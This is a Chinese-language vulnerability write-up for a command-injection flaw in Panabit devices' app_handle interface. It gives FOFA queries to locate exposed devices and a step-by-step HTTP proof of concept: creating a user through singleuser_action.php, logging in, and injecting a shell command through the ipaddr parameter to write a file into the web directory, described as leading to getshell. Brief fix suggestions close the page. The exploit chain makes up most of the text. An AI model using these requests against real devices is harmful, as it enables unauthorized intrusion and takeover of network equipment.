漏洞信息
| 属性 | 值 |
|---|---|
| 漏洞名称 | Panabit app_handle 命令注入漏洞 |
| 漏洞类型 | 命令注入 |
| 组件 | Panabit |
| 严重程度 | 高危 |
漏洞概述
Panabit 设备app_handle接口存在命令注入漏洞,攻击者可通过在ipaddr参数中构造恶意命令,将内容写入web目录进而getshell。
FOFA查询语法
app="Panabit"
或者基于关键字搜索:
title="Panabit" || header="Panabit"
漏洞复现
POC
Step 1: 添加用户
POST /singleuser_action.php HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded
Content-Length: 694
syncInfo={"user":{"userId":"88172765","userName":"88172765","employeeId":"88172765","departmentId":"88172765","departmentName":"88172765","coporationId":"88172765","corporationName":"88172765","userSex":"1"}}
Step 2: 用户登录(获取Cookie)
POST /1ogin.php HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
user=88172765&mypass=88172765
Step 3: 执行命令写入文件
POST /App/app_handle.php HTTP/1.1
Host: target
Cookie: PHPSESSID=xxx
Content-Type: application/x-www-form-urlencoded
type=wlist_ipdetail&ipaddr=;echo test >sxmjagze.txt;
Step 4: 访问写入的文件
GET /App/sxmjagze.txt HTTP/1.1
Host: target
特征
- 登录接口:
/1ogin.php - 注入接口:
/App/app_handle.php - 参数:
type=wlist_ipdetail,ipaddr - 利用:
;echo ... >/App/... - 访问:直接GET
/App/filename
修复建议
- 对用户输入进行严格过滤
- 禁用系统命令执行功能
- 更新设备固件到最新版本
- 限制管理接口访问
来源:实战安全研究 | 原文链接:https://mp.weixin.qq.com/s/B_vkMhzIlm3WEukCTB85jw
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END










暂无评论内容